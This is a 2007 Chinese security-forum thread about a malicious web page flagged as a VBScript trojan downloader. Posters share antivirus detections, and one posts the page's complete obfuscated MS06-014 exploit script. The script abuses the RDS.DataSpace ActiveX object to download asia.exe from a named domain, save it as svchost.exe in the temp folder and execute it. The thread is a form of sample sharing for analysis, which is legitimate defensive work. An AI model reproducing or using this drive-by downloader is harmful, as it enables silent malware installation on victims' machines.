毒网一个

yzt1004

探测到: 木马程序 Trojan-Downloader.VBS.Small.dk        网址: http://www.xiaoshuowang.com.cn/y.html
不知道有没有什么新鲜玩意儿，，，

The EQs

RP好。。。进去后只发现显示时间

yzt1004

楼上小心，，，
我是用火狐进的，补丁都打过了，，，

小邪邪

有恶意脚本

The EQs

谁给个样本？？？

gbwyy

小红伞和费尔都报了

dikex

on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application"
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set xasonc = document.createElement(m1)
    xason = "http://www.xiaoshuowang.com.cn/asia.exe"
    xasonc.setAttribute m2, m3
    xasoni=m4
    Set xasond = xasonc.CreateObject(xasoni,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    xasonf=yhangf&yhangg&yhangh&yhangi
    xasong=xasonf
    set xasona = xasonc.createobject(xasong,"")
    xasona.type = 1
    xasonh="G"&"E"&"T"
    xasond.Open xasonh, xason, False
    xasond.Send
    xason9="svchost.exe"
    set xasonb = xasonc.createobject(m6,"")
    set xasone = xasonb.GetSpecialFolder(2)
    xasona.open
    xason8="xasona.BuildPath(xasona,xason8)"
    xason7="xasonb.BuildPath(xasonb,xason7)"
    xason6="xasonc.BuildPath(xasond,xason6)"
    xason5="xasond.BuildPath(xasonf,xason5)"
    xason4="xasone.BuildPath(xasong,xason4)"
    xason3="xasonf.BuildPath(xasonh,xason4)"
    xason2="xasong.BuildPath(xasoni,xason3)"
    xason1="xasonh.BuildPath(xasong,xason1)"
    xason0="xasoni.BuildPath(xasonk,xason0)"
    xason9= xasonb.BuildPath(xasone,xason9)
    xasona.write xasond.responseBody
    xasona.savetofile xason9,2
    xasona.close
    set xasone = xasonc.createobject(m5,"")
    xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",


MS06-014网马，下载http://www.xiaoshuowang.com.cn/asia.exe

[ 本帖最后由 dikex 于 2007-3-27 22:59 编辑 ]

The EQs

多谢刺猬。。。。。

tonger2003

现在卡巴完善了哦

我D盘感染的程序 没有删除掉  修复了感染的程序~~`

solcroft